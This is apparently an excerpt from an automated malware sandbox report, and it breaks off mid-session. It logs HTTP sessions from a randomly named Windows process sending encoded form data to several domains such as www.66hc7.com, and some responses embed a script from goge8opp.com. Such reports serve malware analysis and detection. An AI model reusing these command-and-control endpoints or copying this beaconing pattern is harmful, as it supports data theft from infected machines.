                  Data Raw: 79 6c 54 38 65 6c 3d 38 47 76 46 34 49 48 44 6b 78 66 52 53 68 6f 72 59 72 4f 4d 37 77 31 33 6a 54 42 79 4a 4e 33 2f 6f 35 39 4e 4d 2b 64 31 4d 37 4c 6f 48 62 51 42 58 51 4d 67 67 6e 50 75 4d 53 65 37 38 72 39 68 63 70 2b 67 48 41 62 4b 6e 38 4e 66 50 31 6e 58 4e 4a 32 75 34 39 36 57 61 72 6b 75 61 2f 52 48 4d 51 55 58 6e 75 70 53 71 41 44 45 79 74 5a 66 74 2b 57 4b 5a 62 2b 66 54 56 66 75 56 77 50 6b 43 69 72 4c 57 4d 59 59 4b 4d 4d 36 4f 50 55 32 62 6e 65 6e 58 4d 65 31 31 46 33 35 42 6b 50 57 59 52 62 50 37 6c 6a 62 36 6a 64 61 6b 4e 47 61 37 67 43 34 57 54 37 67 4b 78 33 63 52 2b 61 51 64 32 51 56 71 7a 7a 4e 57 4e 75 6d 4c 5a 51 41 79 4d 56 65 31 75 41 33 74 47 48 52 47 4c 61 30 34 55 65 33 2b 4d 36 79 73 72 45 4a 46 4f 6b 4b 6f 6c 6d 52 53 47 77 52 6b 6e 63 56 68 2b 76 46 41 75 41 41 6c 34 56 58 49 38 48 54 72 7a 70 32 2f 33 79 45 6b 57 49 4d 4c 38 4b 41 5a 30 47 6c 45 43 61 54 36 48 78 63 63 4e 42 51 4e 4d 31 44 71 72 76 57 6b 43 7a 50 65 49 4b 78 4d 2f 50 64 55 48 72 64 6f 47 6d 6c 41 6b 43 [TRUNCATED]
                  Data Ascii: ylT8el=8GvF4IHDkxfRShorYrOM7w13jTByJN3/o59NM+d1M7LoHbQBXQMggnPuMSe78r9hcp+gHAbKn8NfP1nXNJ2u496Warkua/RHMQUXnupSqADEytZft+WKZb+fTVfuVwPkCirLWMYYKMM6OPU2bnenXMe11F35BkPWYRbP7ljb6jdakNGa7gC4WT7gKx3cR+aQd2QVqzzNWNumLZQAyMVe1uA3tGHRGLa04Ue3+M6ysrEJFOkKolmRSGwRkncVh+vFAuAAl4VXI8HTrzp2/3yEkWIML8KAZ0GlECaT6HxccNBQNM1DqrvWkCzPeIKxM/PdUHrdoGmlAkCdYFRpz1D2J/8iWGnve6YwVcE5xsemeh/IKp4vvgHvCa2ySblti0gE5BuLPgGzrdK51gmtP2tXif2QZ/1S9IRLWP4NiIGAaFg2BbTlevql+HlD4vyk1UIBO2V2+sCW+cXwY580+N/K6rgbvyOKOBFV7qO1OeaaUR1u0ZL5L+pbNFx8yDNHyPU8jgtvQ9dJ7Wz+2m47pW/rXudADZzMoI8FTOo+210KAMQtyVPMPjTMtKbJZB1povohoHJ9HZRhIWt62VG79i9n8eedaShZfmGWj00ora5OolzbG9aP+Vdr5GU7bCkbziPGUbviidpcVQj+DaMPzMvbLiKGK2BtXYfJz67SHT5fheBf2RHQW/D996m+bCQpjmyAjDaHh+0SRQFfHy2asIxRBfEBek5j0fT5xXz0F9OnDV5qsO+vRPf0TgHRaM81Ch+dRf3qV/1ZoZv2+P0ObvlByoiannVEl/Q/aSDawREP9wrYet8keSt3eDEfsNcO1k7MrcP9iFxkwgg8Dfe6w4NRjURia90o8bkY1U99jBGaOd65BzR5burGbZ9twD6fEuaU19Cb/RW1vR8QxXaVhDGp4lGWK80R6+lNXWD46PU+b/jsJ4gDU20GfBHdbwtxGRv+0/dM+zS7JLxEjA6mNmofj53V7i0XEAJZIuofzvMI7g6v+ [TRUNCATED]


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  4192.168.2.1149723162.0.213.72801164C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe
                  TimestampBytes transferredDirectionData
                  Jul 3, 2024 10:51:22.986321926 CEST410OUTGET /f0fa/?Qb94=7vWTifjxU&ylT8el=xEHl79bWtW6ubhQfSoH97y0Qn20SG8yk5613CYRnCuX+EaUdTnw5hRzhIFWMyf9Ue4jcKh73mqYqHXL3KYCSgMywK+MaAYZcUVEgz/x9qwHKwJpT4dGZYKc= HTTP/1.1
                  Host: www.hawalaz.xyz
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Language: en-US,en;q=0.9
                  Connection: close
                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                  Jul 3, 2024 10:51:28.760766983 CEST1236INHTTP/1.1 404 Not Found
                  Date: Wed, 03 Jul 2024 08:51:23 GMT
                  Server: Apache
                  Content-Length: 16026
                  Connection: close
                  Content-Type: text/html; charset=utf-8
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 [TRUNCATED]
                  Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <meta name="viewport" content="width=device-width, initial-scale=1"><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="hamburger-menu"> <button class="burger" data-state="closed"> <span></span> <span></span> <span></span> </button></div><main> <div class="container"> <div class="row"> <div class="col-md-6 align-self-center"> <svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 800 600"> <g> <defs> <clipPath id="GlassClip"> <path d="M380.857,346.164c-1.247,4.6 [TRUNCATED]
                  Jul 3, 2024 10:51:28.760817051 CEST224INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 2d 32 38 2e 34 38 35 2d 31 36 2e 35 39 39 2d 33 34 2e 38 37 37 2d 32 34 2e 31 39 32 63 2d 33 2e 31 30 31 2d 33 2e 36 38 34 2d 34 2e 31 37 37 2d 38 2e 36 36 2d 32 2e 39 33 2d 31 33 2e 33 31 31 6c 37
                  Data Ascii: s-28.485-16.599-34.877-24.192c-3.101-3.684-4.177-8.66-2.93-13.311l7.453-27.798c0.756-2.82,3.181-4.868,6.088-5.13 c6.755-0.61,20.546-0.608,41.785,5.087s33.181,12.591,38.725,16.498c2.387,1.682,3.
                  Jul 3, 2024 10:51:28.760827065 CEST1236INData Raw: 34 36 31 2c 34 2e 36 36 38 2c 32 2e 37 30 35 2c 37 2e 34 38 38 4c 33 38 30 2e 38 35 37 2c 33 34 36 2e 31 36 34 7a 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 63 6c 69 70 50 61 74 68 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20
                  Data Ascii: 461,4.668,2.705,7.488L380.857,346.164z" /> </clipPath> <clipPath id="cordClip"> <rect width="800" height="600" /> </clipPath> </defs> <g id="planet">
                  Jul 3, 2024 10:51:28.760970116 CEST224INData Raw: 63 33 36 2e 30 36 39 2c 30 2c 36 38 2e 39 37 38 2d 31 2e 31 39 2c 39 33 2e 39 32 32 2d 33 2e 31 34 39 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 20 69 64 3d 22 73 74 61 72 73 22 3e
                  Data Ascii: c36.069,0,68.978-1.19,93.922-3.149" /> </g> <g id="stars"> <g id="starsBig"> <g> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="ro
                  Jul 3, 2024 10:51:28.761044025 CEST1236INData Raw: 75 6e 64 22 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 78 31 3d 22 35 31 38 2e 30 37 22 20 79 31 3d 22 32 34 35 2e 33 37 35 22 20 78 32 3d 22 35 31 38 2e 30
                  Data Ascii: und" stroke-miterlimit="10" x1="518.07" y1="245.375" x2="518.07" y2="266.581" /> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="5
                  Jul 3, 2024 10:51:28.761285067 CEST1236INData Raw: 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e 64 22 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 78
                  Data Ascii: roke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="200.67" y1="483.11" x2="200.67" y2="504.316" /> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimi
                  Jul 3, 2024 10:51:28.761296988 CEST448INData Raw: 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30
                  Data Ascii: </g> <g> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="231.468" y1="291.009" x2="231.468" y2="299.369" /> <l
                  Jul 3, 2024 10:51:28.761578083 CEST1236INData Raw: 20 20 3c 67 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b
                  Data Ascii: <g> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="244.032" y1="547.539" x2="244.032" y2="555.898" /> <line fill="none" stroke="
                  Jul 3, 2024 10:51:28.761723995 CEST1236INData Raw: 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 20 69 64 3d 22 63 69 72 63 6c 65 73 42 69 67 22 3e 0a 0a 20 20 20 20 20
                  Data Ascii: > </g> </g> <g id="circlesBig"> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" cx="588.977" cy="255.978" r="7.9
                  Jul 3, 2024 10:51:28.761734962 CEST448INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 78 3d 22 32 38 33 2e 35 32 31 22 20 63 79 3d 22 35 36 38 2e 30 33 33 22 20 72 3d 22 37 2e 39 35 32 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20
                  Data Ascii: cx="283.521" cy="568.033" r="7.952" /> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" cx="413.618" cy="482.387" r="7.952" />
                  Jul 3, 2024 10:51:28.766108990 CEST1236INData Raw: 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c 6c 3d 22 23 30 45 30 36 32 30 22 20 63 78 3d 22 34 33 34 2e 38 32 34 22 20 63 79 3d 22 32 36 33 2e 39 33 31 22 20 72 3d 22 32 2e 36 35 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20
                  Data Ascii: <circle fill="#0E0620" cx="434.824" cy="263.931" r="2.651" /> <circle fill="#0E0620" cx="183.708" cy="544.176" r="2.651" /> <circle fill="#0E0620" cx="382.515" cy="530.923" r="2.651" /> <


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  5192.168.2.1149724162.209.189.210801164C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe
                  TimestampBytes transferredDirectionData
                  Jul 3, 2024 10:51:50.852684021 CEST663OUTPOST /qvp8/ HTTP/1.1
                  Host: www.66hc7.com
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Encoding: gzip, deflate
                  Accept-Language: en-US,en;q=0.9
                  Origin: http://www.66hc7.com
                  Content-Length: 203
                  Cache-Control: no-cache
                  Connection: close
                  Content-Type: application/x-www-form-urlencoded
                  Referer: http://www.66hc7.com/qvp8/
                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                  Data Raw: 79 6c 54 38 65 6c 3d 72 72 4e 50 6f 59 38 39 73 72 38 2f 58 4d 78 35 36 74 36 33 63 35 59 59 75 2b 66 50 58 52 6f 59 69 41 71 4c 75 78 6d 42 5a 39 49 30 42 53 61 76 70 59 4e 79 69 74 6a 6c 75 5a 77 47 73 2f 44 39 4f 64 54 35 32 5a 4e 59 52 79 6a 64 50 52 35 62 71 72 70 34 78 33 33 2f 64 49 58 38 47 6c 45 57 44 67 58 35 43 4e 43 4d 7a 48 38 58 31 68 54 55 61 6d 52 5a 65 2b 6b 6b 44 68 49 6a 66 4c 59 68 74 64 43 69 51 46 77 53 78 4c 31 72 69 35 30 2f 63 58 48 74 65 53 76 4b 2b 61 67 42 71 53 54 7a 68 70 52 67 79 4d 39 6e 2f 49 42 38 6c 78 6e 41 4b 75 39 32 6f 4e 52 2f 69 74 75 34 34 73 37 4f 39 67 3d 3d
                  Data Ascii: ylT8el=rrNPoY89sr8/XMx56t63c5YYu+fPXRoYiAqLuxmBZ9I0BSavpYNyitjluZwGs/D9OdT52ZNYRyjdPR5bqrp4x33/dIX8GlEWDgX5CNCMzH8X1hTUamRZe+kkDhIjfLYhtdCiQFwSxL1ri50/cXHteSvK+agBqSTzhpRgyM9n/IB8lxnAKu92oNR/itu44s7O9g==
                  Jul 3, 2024 10:51:51.365811110 CEST192INHTTP/1.1 200 OK
                  Content-Type: text/html
                  Content-Length: 96
                  Cache-Control: max-age=2592000
                  Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 67 6f 67 65 38 6f 70 70 2e 63 6f 6d 3a 33 30 31 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                  Data Ascii: <html><body><script src="http://goge8opp.com:301" type="text/javascript"></script></body></html>


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  6192.168.2.1149725162.209.189.210801164C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe
                  TimestampBytes transferredDirectionData
                  Jul 3, 2024 10:51:53.386491060 CEST683OUTPOST /qvp8/ HTTP/1.1
                  Host: www.66hc7.com
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Encoding: gzip, deflate
                  Accept-Language: en-US,en;q=0.9
                  Origin: http://www.66hc7.com
                  Content-Length: 223
                  Cache-Control: no-cache
                  Connection: close
                  Content-Type: application/x-www-form-urlencoded
                  Referer: http://www.66hc7.com/qvp8/
                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                  Data Raw: 79 6c 54 38 65 6c 3d 72 72 4e 50 6f 59 38 39 73 72 38 2f 58 76 35 35 39 4b 75 33 4c 4a 59 48 79 75 66 50 5a 78 6f 55 69 41 6d 4c 75 30 66 4d 4d 62 34 30 43 33 6d 76 6f 64 78 79 33 74 6a 6c 6c 35 77 44 68 66 44 4d 4f 64 4f 5a 32 64 4e 59 52 79 33 64 50 56 31 62 71 36 70 33 78 6e 33 35 52 6f 58 2b 5a 56 45 57 44 67 58 35 43 4e 6d 6d 7a 48 6b 58 31 52 44 55 5a 45 35 65 51 65 6b 72 56 52 49 6a 4a 4c 59 6c 74 64 44 33 51 45 74 31 78 4a 39 72 69 39 77 2f 4e 6d 48 75 4a 69 76 41 6a 4b 68 6f 74 54 71 4a 6c 4a 34 54 2f 76 74 4f 72 73 78 71 67 33 32 61 61 4e 30 68 72 65 5a 39 32 4c 50 49 78 64 65 48 6d 76 48 33 2f 67 79 63 4b 37 35 76 53 57 51 75 55 42 2b 57 50 30 67 3d
                  Data Ascii: ylT8el=rrNPoY89sr8/Xv559Ku3LJYHyufPZxoUiAmLu0fMMb40C3mvodxy3tjll5wDhfDMOdOZ2dNYRy3dPV1bq6p3xn35RoX+ZVEWDgX5CNmmzHkX1RDUZE5eQekrVRIjJLYltdD3QEt1xJ9ri9w/NmHuJivAjKhotTqJlJ4T/vtOrsxqg32aaN0hreZ92LPIxdeHmvH3/gycK75vSWQuUB+WP0g=
                  Jul 3, 2024 10:51:53.889050007 CEST192INHTTP/1.1 200 OK
                  Content-Type: text/html
                  Content-Length: 96
                  Cache-Control: max-age=2592000
                  Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 67 6f 67 65 38 6f 70 70 2e 63 6f 6d 3a 33 30 31 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                  Data Ascii: <html><body><script src="http://goge8opp.com:301" type="text/javascript"></script></body></html>


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  7192.168.2.1149726162.209.189.210801164C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe
                  TimestampBytes transferredDirectionData
                  Jul 3, 2024 10:51:55.912646055 CEST1696OUTPOST /qvp8/ HTTP/1.1
                  Host: www.66hc7.com
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Encoding: gzip, deflate
                  Accept-Language: en-US,en;q=0.9
                  Origin: http://www.66hc7.com
                  Content-Length: 1235
                  Cache-Control: no-cache
                  Connection: close
                  Content-Type: application/x-www-form-urlencoded
                  Referer: http://www.66hc7.com/qvp8/
                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                  Data Raw: 79 6c 54 38 65 6c 3d 72 72 4e 50 6f 59 38 39 73 72 38 2f 58 76 35 35 39 4b 75 33 4c 4a 59 48 79 75 66 50 5a 78 6f 55 69 41 6d 4c 75 30 66 4d 4d 62 77 30 42 42 79 76 75 36 6c 79 78 64 6a 6c 35 70 77 43 68 66 44 72 4f 64 57 56 32 64 4a 49 52 78 50 64 4a 41 70 62 37 2b 31 33 37 6e 33 35 5a 49 58 2f 47 6c 46 4d 44 6a 2f 31 43 4e 32 6d 7a 48 6b 58 31 54 4c 55 4f 47 52 65 53 65 6b 6b 44 68 49 76 66 4c 5a 43 74 5a 76 6e 51 45 70 50 78 35 64 72 6a 5a 55 2f 50 30 2f 75 56 79 76 47 69 4b 68 77 74 53 57 73 6c 4a 31 6f 2f 73 78 6b 72 72 64 71 74 44 44 4e 4e 4f 63 41 2f 4e 56 37 6f 49 7a 30 35 50 57 69 2b 4d 43 44 30 69 65 6a 5a 39 39 44 50 55 42 51 48 31 43 58 55 55 4c 30 57 2f 5a 46 61 77 47 71 4d 43 45 52 63 33 34 73 63 73 33 65 31 38 55 69 56 55 6b 68 75 44 76 31 71 71 59 76 33 4c 39 6e 44 52 6f 61 66 4d 38 38 44 56 59 57 6c 51 62 49 6b 59 4d 35 61 44 42 4d 7a 70 7a 31 48 2b 70 4c 69 41 4c 30 6e 68 39 37 68 51 58 4a 41 6a 59 2f 54 31 33 61 6b 4a 67 6f 59 39 6d 64 30 52 6b 61 70 41 34 4c 33 37 55 41 78 74 4c [TRUNCATED]
                  Data Ascii: ylT8el=rrNPoY89sr8/Xv559Ku3LJYHyufPZxoUiAmLu0fMMbw0BByvu6lyxdjl5pwChfDrOdWV2dJIRxPdJApb7+137n35ZIX/GlFMDj/1CN2mzHkX1TLUOGReSekkDhIvfLZCtZvnQEpPx5drjZU/P0/uVyvGiKhwtSWslJ1o/sxkrrdqtDDNNOcA/NV7oIz05PWi+MCD0iejZ99DPUBQH1CXUUL0W/ZFawGqMCERc34scs3e18UiVUkhuDv1qqYv3L9nDRoafM88DVYWlQbIkYM5aDBMzpz1H+pLiAL0nh97hQXJAjY/T13akJgoY9md0RkapA4L37UAxtLtAWwqwmBUu+VwYLo1aG7G4ktOwBs26gIOu5F9WHtaYfc73uEz7vggyBr/v2UAveb2dtNVREXmGrjDeC++ZbhtATIpmfjzSVtinWumPtwmh+8ZFdGhSEzIHxQ8MP41q12rjd8FxvxwPTlibMR+aKZqwbrtmu5+xx7Uc4DGfI8O3xAKR6FDC5FKNpnIYirWFT5YzYQBxsp/WGJGgTCQ9f2j2OnvH7Z4FKAsPSAt63VglfcXdAsS9a047w4nPAze2LH02XA2/FhIf9W4smG6T6teWVnS4oo0GEF5n4a/q706nFoAxmHGQ4KoX9jLZyxEv3vFZqFmavUluRaI3MjBEoyRD1Her8snwTfqs0ZRILQ1o+feLM8VrP9kBAdMH4BgJekReacTfDeb9sn5xcwjV7v67PjkH8MpMO4Lma/ZZfHNOAdbQL+RbV2UJxxSSyOfQieadNVewq+qJ5X39cX3rXysgjwAPYvm7GyFgUW1vnJJma1ZSDuoM+cGoSDr/nHCOtdqGnPzJtVrEJKl/Nm7yIkb7DW80mjTcdargG3+O6sB+Mxxk8Eetg4M4uBtQLUvjUZ4KuseGoXr8OBoPIywKaM4Y0EhNLQ4vjrXC+63ZCCn9Iqm3zMS6FjvFpLKqZRIlOjvoEKjGwPcFMXYkbbZkN66/5SN+MGWquXSP [TRUNCATED]
                  Jul 3, 2024 10:51:56.438339949 CEST192INHTTP/1.1 200 OK
                  Content-Type: text/html
                  Content-Length: 96
                  Cache-Control: max-age=2592000
                  Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 67 6f 67 65 38 6f 70 70 2e 63 6f 6d 3a 33 30 31 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                  Data Ascii: <html><body><script src="http://goge8opp.com:301" type="text/javascript"></script></body></html>


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  8192.168.2.1149727162.209.189.210801164C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe
                  TimestampBytes transferredDirectionData
                  Jul 3, 2024 10:51:58.444401979 CEST408OUTGET /qvp8/?ylT8el=mplvrs1ArIkdV+pbxofmUrh9prbBWCkT+xqmpCLdJLMyBhuMsd9mhte1ppk8n/DSN9iY8LBVRzSodz5vy5F/ty/lBcXgfSQQVjq9BvSoxXo59QHAZm1IeeI=&Qb94=7vWTifjxU HTTP/1.1
                  Host: www.66hc7.com
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Language: en-US,en;q=0.9
                  Connection: close
                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                  Jul 3, 2024 10:51:58.945667028 CEST192INHTTP/1.1 200 OK
                  Content-Type: text/html
                  Content-Length: 96
                  Cache-Control: max-age=2592000
                  Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 67 6f 67 65 38 6f 70 70 2e 63 6f 6d 3a 33 30 31 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                  Data Ascii: <html><body><script src="http://goge8opp.com:301" type="text/javascript"></script></body></html>


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  9192.168.2.1149728198.16.50.172801164C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe
                  TimestampBytes transferredDirectionData
                  Jul 3, 2024 10:52:04.428543091 CEST678OUTPOST /450c/ HTTP/1.1
                  Host: www.zl1l5r.website
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Encoding: gzip, deflate
                  Accept-Language: en-US,en;q=0.9
                  Origin: http://www.zl1l5r.website
                  Content-Length: 203
                  Cache-Control: no-cache
                  Connection: close
                  Content-Type: application/x-www-form-urlencoded
                  Referer: http://www.zl1l5r.website/450c/
                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                  Data Raw: 79 6c 54 38 65 6c 3d 79 59 41 61 36 36 71 6e 4b 4e 5a 62 52 65 36 76 6a 47 32 47 6a 6a 6d 2b 55 59 38 51 76 43 77 73 4a 58 30 71 49 30 52 5a 38 75 41 33 73 49 44 30 4e 78 4a 77 33 59 73 6d 46 4d 47 58 57 61 45 56 61 48 45 30 39 77 79 52 39 43 5a 52 4b 46 5a 6d 6e 59 61 31 6f 49 72 57 41 53 43 48 43 62 4f 35 4b 7a 75 58 6a 74 34 5a 68 6b 37 4e 37 31 33 7a 37 50 31 69 65 38 74 58 6b 5a 72 62 75 43 55 48 61 45 32 42 6e 32 58 49 43 52 4b 55 64 6e 49 6c 41 32 34 32 6a 71 58 42 31 6d 52 52 76 43 42 35 75 2b 6e 42 54 4b 75 46 70 76 43 53 6f 79 53 31 77 53 5a 35 4e 54 6e 6e 55 4b 43 67 46 76 6f 4c 4b 51 3d 3d
                  Data Ascii: ylT8el=yYAa66qnKNZbRe6vjG2Gjjm+UY8QvCwsJX0qI0RZ8uA3sID0NxJw3YsmFMGXWaEVaHE09wyR9CZRKFZmnYa1oIrWASCHCbO5KzuXjt4Zhk7N713z7P1ie8tXkZrbuCUHaE2Bn2XICRKUdnIlA242jqXB1mRRvCB5u+nBTKuFpvCSoyS1wSZ5NTnnUKCgFvoLKQ==
                  Jul 3, 2024 10:52:05.063060045 CEST190INHTTP/1.1 400 Bad Request
                  Server: nginx
                  Date: Wed, 03 Jul 2024 08:52:04 GMT
                  Content-Type: text/html; charset=utf-8
                  Transfer-Encoding: chunked
                  Connection: close
                  Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: d404 Not Found0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  10192.168.2.1149729198.16.50.172801164C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe
                  TimestampBytes transferredDirectionData
                  Jul 3, 2024 10:52:06.961721897 CEST698OUTPOST /450c/ HTTP/1.1
